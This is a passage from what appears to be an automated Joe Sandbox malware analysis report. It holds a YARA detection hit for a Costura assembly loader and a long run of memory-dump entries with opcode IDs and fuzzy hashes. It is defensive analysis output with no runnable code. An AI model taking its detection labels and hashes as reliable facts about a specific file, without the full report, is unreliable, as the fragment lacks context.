                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Reset < >
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3_^$3_^
                                              • API String ID: 0-3331454449
                                              • Opcode ID: e40c81fbc0415ea56f18908e59a2d9ca6efdd4df6a8247ceda2a94e135b09128
                                              • Instruction ID: 93f0191b0ff5df2254009fb8349fea745353e789492a5cd5093164c9577be8f0
                                              • Opcode Fuzzy Hash: e40c81fbc0415ea56f18908e59a2d9ca6efdd4df6a8247ceda2a94e135b09128
                                              • Instruction Fuzzy Hash: A8A14831A09A4A8FEB59EF68D4696E977E0FF54314F0500BAD04AC71E6DF78A942C780
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (:_H
                                              • API String ID: 0-672837810
                                              • Opcode ID: 6ad6ca21d25af5a13a40e8a9e73750d7fab2278720926f0331ed1756a3d219f0
                                              • Instruction ID: 1e121ead93b41e7796ea82955c80873f1d68533c7aa5253d6897266473c1ae17
                                              • Opcode Fuzzy Hash: 6ad6ca21d25af5a13a40e8a9e73750d7fab2278720926f0331ed1756a3d219f0
                                              • Instruction Fuzzy Hash: D2F13B72F1AA4E0FE7A9DB7844755B823D2EF95350B4501BED04EC32E6EE69AD428340
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9:_H
                                              • API String ID: 0-3233775688
                                              • Opcode ID: 9b57c61a15a03f90c050dba69140f60e2e5d83ab27eac001f98b8786d8581a9a
                                              • Instruction ID: 1c0facc2f329754b61bc5c0126ec0df21adea6dc8b0f2bc8f277a021b8055aa6
                                              • Opcode Fuzzy Hash: 9b57c61a15a03f90c050dba69140f60e2e5d83ab27eac001f98b8786d8581a9a
                                              • Instruction Fuzzy Hash: 29D14B31B0EE4D4FEBA9DB6C88656A577E1FF99340B0500BED04DC72E6DE28AD428741
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695237907.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b990000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f8f15ebb704ab3b1a5cbf079e89e4dd677679dcc0b05867552142d314b716ab
                                              • Instruction ID: 21344818bd26c56a6d86147bb1464c20f54784c2732cd16ab6b759dba282ee98
                                              • Opcode Fuzzy Hash: 4f8f15ebb704ab3b1a5cbf079e89e4dd677679dcc0b05867552142d314b716ab
                                              • Instruction Fuzzy Hash: B532BD22B2EE5E2BF7F9966C047523513D3EF98654B5A41BAC05EC32F6ED29ED024301
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695237907.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b990000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4cd34d1c49308ac58886bddf04c79226c779b6361a3d9583d6747a8c02ecead9
                                              • Instruction ID: 7239ec9d98cbb3deb39873422efb946108f29ecd8809b0f2200d54bd241e7121
                                              • Opcode Fuzzy Hash: 4cd34d1c49308ac58886bddf04c79226c779b6361a3d9583d6747a8c02ecead9
                                              • Instruction Fuzzy Hash: 4E029721B2EE1F3BFAF6A3A8107127913C2EFD9255B56017AD45DC32F7ED19AA024341
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e61545b91ac8b574c722b53e943bd5f936caa935fd71dd5f2c1b4dead2db423
                                              • Instruction ID: 57a8232af01010df3664351d43447f7f7ca2c4199e89642a5c46236c36e9966b
                                              • Opcode Fuzzy Hash: 8e61545b91ac8b574c722b53e943bd5f936caa935fd71dd5f2c1b4dead2db423
                                              • Instruction Fuzzy Hash: FDB12931B0EA8E4FEBA4DB6884656B677D1FF54310B0600BDE44DC72B6DE68ED428381
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0f34bb0254145c14c22a6af69985f0da15b00261d0f293b8c829c06685c223d
                                              • Instruction ID: 21ec1e48c3cddfe05a64ebfdf27c9af841c67242a8f3fd1b99039c5937eab3e9
                                              • Opcode Fuzzy Hash: b0f34bb0254145c14c22a6af69985f0da15b00261d0f293b8c829c06685c223d
                                              • Instruction Fuzzy Hash: 6CB16831A0DB8D4FDB95EBA8D85A6E9BBF0EF65310F0441AAD049C71A2DE349842C781
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1693415098.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b8b0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b47dbb8267319da9a2dc80512f5e5ab241ef17e169cde636286d288ec9a88bf4
                                              • Instruction ID: 1fc44cc12e6218c8357a9e4bd2dd9893c0b7748f1d54cebd21e1bd7a66bdd8a8
                                              • Opcode Fuzzy Hash: b47dbb8267319da9a2dc80512f5e5ab241ef17e169cde636286d288ec9a88bf4
                                              • Instruction Fuzzy Hash: D1B12E70A0E68A5FD759EFB8D4266A97BE1FF45320B0500FED04ACB5E6DA2C6843C741
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 140d2de5eac8ae1d25f8263c8ea9e1eba79641abad7eb7e5682b2ff382cabda3
                                              • Instruction ID: 48d3092842610a1a2d05997f0198c263881df2e93e372613e8270175aa1363e9
                                              • Opcode Fuzzy Hash: 140d2de5eac8ae1d25f8263c8ea9e1eba79641abad7eb7e5682b2ff382cabda3
                                              • Instruction Fuzzy Hash: 98A1E530B19A4E4FDB98EF68C465ABA77D1EF54350F0105B9D40EC72E6DE78A982C780
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca6fd5fb5406fa88dd8b58bb38ffb85e98a2b1610a11f00ce1111897f22e88fa
                                              • Instruction ID: 0ba7f6ecd0058e860a0587fe30da1c40b2b8df917c306fb3ce79d79b1948d72e
                                              • Opcode Fuzzy Hash: ca6fd5fb5406fa88dd8b58bb38ffb85e98a2b1610a11f00ce1111897f22e88fa
                                              • Instruction Fuzzy Hash: CC911530A09A4D4FEB64EF68C8597E9BBE0EF55310F1540BAD00DD71A2DB78A985CB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c1e966687b0deef0016245f3a5c615e219124a4c78595b5f346a2a9130fd12e
                                              • Instruction ID: abcfda486d17a527095d2a77b26112e45572f1fbcd05a8d83ff0f44b2a9f4744
                                              • Opcode Fuzzy Hash: 1c1e966687b0deef0016245f3a5c615e219124a4c78595b5f346a2a9130fd12e
                                              • Instruction Fuzzy Hash: 9581583160FA8A4FD3A5D77C88641A57BE1EF45210B4A09FED08ACB5F3DE58A946C341
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e060208968a4b421d7c16c5945fdbc8797fc5b451a71a4610c5028d8751e18f
                                              • Instruction ID: 38f40a2a7de24d901a463e58ba1628dbd4e07ebd95414bc7fb4f5cb94c203b85
                                              • Opcode Fuzzy Hash: 9e060208968a4b421d7c16c5945fdbc8797fc5b451a71a4610c5028d8751e18f
                                              • Instruction Fuzzy Hash: 92610330E0DB4C4FDB58DFA8985AAE9BBF0EF55310F0541ABD00DD71A2DA74A985CB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1693415098.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b8b0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a2e2a596e7106c307376b35e7a11f994e8124fe6227871f5057c8e7f47cdf3ca
                                              • Instruction ID: 8599f7abf6b7b43fc137fe57f05308b2b0810d6d9f4f1eb86878e725191689cc
                                              • Opcode Fuzzy Hash: a2e2a596e7106c307376b35e7a11f994e8124fe6227871f5057c8e7f47cdf3ca
                                              • Instruction Fuzzy Hash: 2251CB71B0D52D5FF764AB68D869AF973D0EF59310F05027AD40DC71A2DD25AE428AC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1693415098.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b8b0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e83d7ca4176162f36d35b7b5040be1143eb494369e445667e9b1235dde2b4a1
                                              • Instruction ID: 2b884aa7f1650234526c116786465e819c43c8ba82a65ea441877a6fc3094748
                                              • Opcode Fuzzy Hash: 1e83d7ca4176162f36d35b7b5040be1143eb494369e445667e9b1235dde2b4a1
                                              • Instruction Fuzzy Hash: 17513B71B096865FD309EBB8A4296E97BE0EF46330B0501FFD089CB1E7DA6C68478751
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56e75c35aa1f02b5133f14290836540fc55ad8293097adf7ed5f217639769379
                                              • Instruction ID: 3aee55aa832116778a0318334eeac4147b61fd4211e8de9f73b841dfb2862055
                                              • Opcode Fuzzy Hash: 56e75c35aa1f02b5133f14290836540fc55ad8293097adf7ed5f217639769379
                                              • Instruction Fuzzy Hash: 9451F871B0AD1E4FEBA5EB688465EB977D1FF54700B5600B9E40DC72A1EE68ED01C341
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1693415098.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b8b0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 682d8c0921d979197ddb07aeffd1b66e04327c6292ed9cd194cf88e428e4452f
                                              • Instruction ID: 6d9f0a1d2dd0a8d3fc42d20f608ba33120aba958c85429ba101d43fa7996d9dd
                                              • Opcode Fuzzy Hash: 682d8c0921d979197ddb07aeffd1b66e04327c6292ed9cd194cf88e428e4452f
                                              • Instruction Fuzzy Hash: 1A51197050E7861FD745DFB888256A67FE1EF4A320B0501FED089CB5E6DA2C58438751
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 211b4bf1a2b1f87e4b40393a89a6e5ffa40873c8b9a0926000403a67e3736785
                                              • Instruction ID: cd1de29fa7bb189ad0b7ce256c476b07e665b65c2a2e5abd60a8ff1cfc1ae7de
                                              • Opcode Fuzzy Hash: 211b4bf1a2b1f87e4b40393a89a6e5ffa40873c8b9a0926000403a67e3736785
                                              • Instruction Fuzzy Hash: CE411671B0DA8E4FDB99DF6C8865AA93BE1EF55304B0540EAD04DCB2A7DA38DC42C741
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: faff2703dcb1f7f5e3d0d477380f32d8a29c9e6a6a12664bef425b3b6cb28b26
                                              • Instruction ID: 2526f3869b793c7d193add407fc5c5efbb890f633ace408b670390d468eba2b4
                                              • Opcode Fuzzy Hash: faff2703dcb1f7f5e3d0d477380f32d8a29c9e6a6a12664bef425b3b6cb28b26
                                              • Instruction Fuzzy Hash: 6C41C571A1DA8E8FDB89DF6C8864AA93BF1FF58304B0540EAD05DC72A6DA38DD41C741
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1693415098.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b8b0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ff607d854d91baa0dab1e4f6aff328708ec1165b7eea11e00de04344266e54ff
                                              • Instruction ID: 0252c0eecb1c06b3e5bdfe237d294e9b91d7c1e737e89856e81321b06b3d01f5
                                              • Opcode Fuzzy Hash: ff607d854d91baa0dab1e4f6aff328708ec1165b7eea11e00de04344266e54ff
                                              • Instruction Fuzzy Hash: B541D961F2E95D4FE7A8E7BC84656BD67E2EF9C310F460179D00EC72AACD2869424780
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd1b063281b123ac23e6ef7bd79db72adbaec8b042e2053908a4232ff7023e91
                                              • Instruction ID: c7cd2bbfe385f1631b36cdf6bb5f1a53ce9a886c34bcd2e382f65114de3ebdcc
                                              • Opcode Fuzzy Hash: bd1b063281b123ac23e6ef7bd79db72adbaec8b042e2053908a4232ff7023e91
                                              • Instruction Fuzzy Hash: 50414431B08A5D8FDF98EF58D895AA973E1FF6C301B55056AE40DC32A5CE35EC428781
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cbe2a819606ff047e3e800f06e48defa394c0b87e1792bdb627c5088b9012b51
                                              • Instruction ID: 0100cafea725823df6ea81c49bd94f904ce1ebac979390e4fb07edcc739df4c5
                                              • Opcode Fuzzy Hash: cbe2a819606ff047e3e800f06e48defa394c0b87e1792bdb627c5088b9012b51
                                              • Instruction Fuzzy Hash: 86415431B08A5D8FDF98EF18D855AA973E1FF6C300B51056AE41DC32A6DE35EC428781
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695237907.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b990000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b52bb96d66ee9736ec6d42960480f6eb8b2c8fa9f48f748bb84030825cfef82b
                                              • Instruction ID: 4be576711fdea3b2cf0ad861c12b0d0f0a089858ced3a6a43edaac3d2ca2c937
                                              • Opcode Fuzzy Hash: b52bb96d66ee9736ec6d42960480f6eb8b2c8fa9f48f748bb84030825cfef82b
                                              • Instruction Fuzzy Hash: A2316611B2AE5F1BF7E9A36C047523912C3EFD8645B5A01BAD41EC32F6EE29ED024341
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cdca8962597f1b3fcbbad97b06d932bcd44c54ec3285e6a82be73a377d560412
                                              • Instruction ID: dbba733a06a29fe83f1c83c0d5990788d1e3b9c39095bf57dc0cc523ecddfc15
                                              • Opcode Fuzzy Hash: cdca8962597f1b3fcbbad97b06d932bcd44c54ec3285e6a82be73a377d560412
                                              • Instruction Fuzzy Hash: 95318132B1CA1D8FDB58DF5CA8525B873D1FB98324B11057AE44DC3262EE25EC428781
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695237907.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b990000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d3c8774fcbac3f829e41db115d93bab95b9d8f9bdc6aca7df970bcd0082a57e
                                              • Instruction ID: ab89cbe0718f27585c6f775d7113b00d4e28e01daba18bd703f45cd381e9ff99
                                              • Opcode Fuzzy Hash: 9d3c8774fcbac3f829e41db115d93bab95b9d8f9bdc6aca7df970bcd0082a57e
                                              • Instruction Fuzzy Hash: 22317F21B2AE5F2BF7E9A36C047123912C3EFD8655B5A017AD01EC32F6ED29ED024241
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695237907.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b990000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 465537436fb718e7a0f8576d20eb02c03afa104e56163877d4d62d639cc7b2e0
                                              • Instruction ID: 569aff860c099dd20c91b676c828cdd85c09811de2b7e6705d6782dc322ed174
                                              • Opcode Fuzzy Hash: 465537436fb718e7a0f8576d20eb02c03afa104e56163877d4d62d639cc7b2e0
                                              • Instruction Fuzzy Hash: 80317321B2AE5E2BF7E9A76C047127912C3EFD8655B56417AD40EC32F6ED28DD024341
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c989014f92e8ab418c1012e8e1f4dd4dbb298af1861d07f0788e713fabb6fce
                                              • Instruction ID: ddc700f9d5356514e4fb0de9afb62f280bc64d23a4be70379efb46d7b83ac621
                                              • Opcode Fuzzy Hash: 7c989014f92e8ab418c1012e8e1f4dd4dbb298af1861d07f0788e713fabb6fce
                                              • Instruction Fuzzy Hash: 56312C31A0DB854FD36E9B6C58565697FD0EF5A321F0902AFE089C31E3DD545801C392
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 99058fc7c7cbd99e6d9acdc4042c664399df6d2a6b34f497657ffc051ac7e632
                                              • Instruction ID: c46cf8674d0f4430ff8655dbb8fa762ec810080fd6bcba1ec213cc04443639dd
                                              • Opcode Fuzzy Hash: 99058fc7c7cbd99e6d9acdc4042c664399df6d2a6b34f497657ffc051ac7e632
                                              • Instruction Fuzzy Hash: D7213C6171EF8E0FE7A9A7AC58A456077D0FF6828070501BBD44DC31E6ED44AD468341
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1693415098.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b8b0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc33270423ed490f231ecb8f20efb5852bb5435440117685eeabe6ce6da7a0b5
                                              • Instruction ID: 48c640b6ce3b644302f593442acb814d5e9662e5e58b38e24d278ba1ce483747
                                              • Opcode Fuzzy Hash: fc33270423ed490f231ecb8f20efb5852bb5435440117685eeabe6ce6da7a0b5
                                              • Instruction Fuzzy Hash: 5331C87090A7861FE345ABB8842AAAA7BE1EF46220F4504FED089CB1A7D92C5C478711
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f125c3ea7018d6cf3b9a17dff49e836b52892b779ba5d8e79ceba2a5cf83ddc
                                              • Instruction ID: cb90f112d6db193ce6ff99a58aaa70c67b0058e5c2b31310295cf9b64a6734da
                                              • Opcode Fuzzy Hash: 6f125c3ea7018d6cf3b9a17dff49e836b52892b779ba5d8e79ceba2a5cf83ddc
                                              • Instruction Fuzzy Hash: A021486160EBCE0FE79A977858A15607BD0FF2624070602FAD08AC71F7ED58A8428351
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88d1ea2ba249e71cb1e7e9d10a82886a43f1070cb152b7094497e8d1e4982f86
                                              • Instruction ID: ce9f38a39e7651815c1b5c8b26e91143a478cd5a94ca5e283b3c59119c48940a
                                              • Opcode Fuzzy Hash: 88d1ea2ba249e71cb1e7e9d10a82886a43f1070cb152b7094497e8d1e4982f86
                                              • Instruction Fuzzy Hash: 8021C130A1FBD84FD366A7B848291A97FF0EF5A251B0905FFD089C72B3D919590AC352
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b518fd562dfa231b87f967eaaf0b5f3c13de27fddb59ad7101d22adb4671c291
                                              • Instruction ID: 8d1458d8d4c0e6139fe155a683031a40e2eea6caf33d8ab1909177468dd0cda5
                                              • Opcode Fuzzy Hash: b518fd562dfa231b87f967eaaf0b5f3c13de27fddb59ad7101d22adb4671c291
                                              • Instruction Fuzzy Hash: AB213D21B0E7C64FE75A97741C76164BBC1EF56260B0A02FBD098C71E7DD5868028352
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695237907.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b990000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 969bbd7a190f288603ca65e4a067cbc6e99e8d0acfe658fa048552c8335bc1b4
                                              • Instruction ID: b38d16c00838ea6ea0ad65954c1d4a819255f52cb6f08ba8232c20f09c11bf91
                                              • Opcode Fuzzy Hash: 969bbd7a190f288603ca65e4a067cbc6e99e8d0acfe658fa048552c8335bc1b4
                                              • Instruction Fuzzy Hash: BB11B411B2EE1F2BFAF6A7AC107127813C2EFC8215B56017DD44EC32A6ED19AA020281
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1693415098.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9b8b0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc18c3e58a11ddbdcad9764afb958fc5be4c35a5fa2760b8f4ab87562c9357e1
                                              • Instruction ID: 38f3de0ed12e218a0a0eee4b4aca49484372a5a699f91dc4eddae6929ccc0fe9
                                              • Opcode Fuzzy Hash: cc18c3e58a11ddbdcad9764afb958fc5be4c35a5fa2760b8f4ab87562c9357e1
                                              • Instruction Fuzzy Hash: AF213A75A0E69E9FE751DBB8C4A52DC7FE0EF48310F1542BAC484C7292D9385647CB80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7fa8cac512edadcf5682e02f2ae1a5127548091ff1427cb322e5f0ecaaffd6a
                                              • Instruction ID: 25b7d5c857ca9c839ab55ecdf9f14a6d5a785c87db660b48fe7ce5e19ac18c13
                                              • Opcode Fuzzy Hash: e7fa8cac512edadcf5682e02f2ae1a5127548091ff1427cb322e5f0ecaaffd6a
                                              • Instruction Fuzzy Hash: 6D11B231B0CA184FD76C9B5CA85A5BABAD1EB98721F05027FF04DD32A2DE60AC018685
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1695712582.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd9ba30000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
